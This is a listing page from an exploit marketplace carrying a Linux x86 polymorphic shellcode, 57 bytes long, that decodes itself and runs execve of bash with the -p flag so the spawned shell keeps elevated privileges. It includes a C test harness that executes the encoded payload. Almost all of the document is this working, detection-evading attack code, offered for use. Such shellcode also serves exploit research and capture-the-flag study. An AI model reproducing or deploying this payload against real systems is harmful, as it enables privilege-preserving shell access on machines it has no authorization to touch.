[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

linux/x86 polymorphic execve("/bin/bash","-p",NULL) - 57 bytes

Author
Jonathan Salwan
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12140
Category
shellcode
Date add
05-05-2010
Platform
linux/x86
==============================================================
linux/x86 polymorphic execve("/bin/bash","-p",NULL) - 57 bytes
==============================================================

/*
 
Title:  Linux x86 - polymorphic execve("/bin/bash","-p",NULL) - 57 bytes
Author: Jonathan Salwan
Mail:   submit@shell-storm.org
Web:    http://www.shell-storm.org
 
!Database of Shellcodes http://www.shell-storm.org/shellcode/
 
 
sh sets (euid, egid) to (uid, gid) if -p not supplied and uid < 100
Read more: http://www.faqs.org/faqs/unix-faq/shell/bash/#ixzz0mzPmJC49
 
Based in http://www.shell-storm.org/shellcode/files/shellcode-606.php
*/
 
#include <stdio.h>
 
char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x21\x80"
           "\x6c\x0e\xff\x01\x80\xe9\x01\x75"
           "\xf6\xeb\x05\xe8\xea\xff\xff\xff"
           "\x6b\x0c\x59\x9a\x53\x67\x69\x2e"
           "\x71\x8a\xe2\x53\x6b\x69\x69\x30"
           "\x63\x62\x74\x69\x30\x63\x6a\x6f"
           "\x8a\xe4\x53\x52\x54\x32\xca\xce"
           "\x81";
 
int main(int argc, char *argv[])
{
        fprintf(stdout,"Length: %d\n",strlen(shellcode));
    (*(void(*)()) shellcode)();      
}



#  0day.today [2024-11-15]  #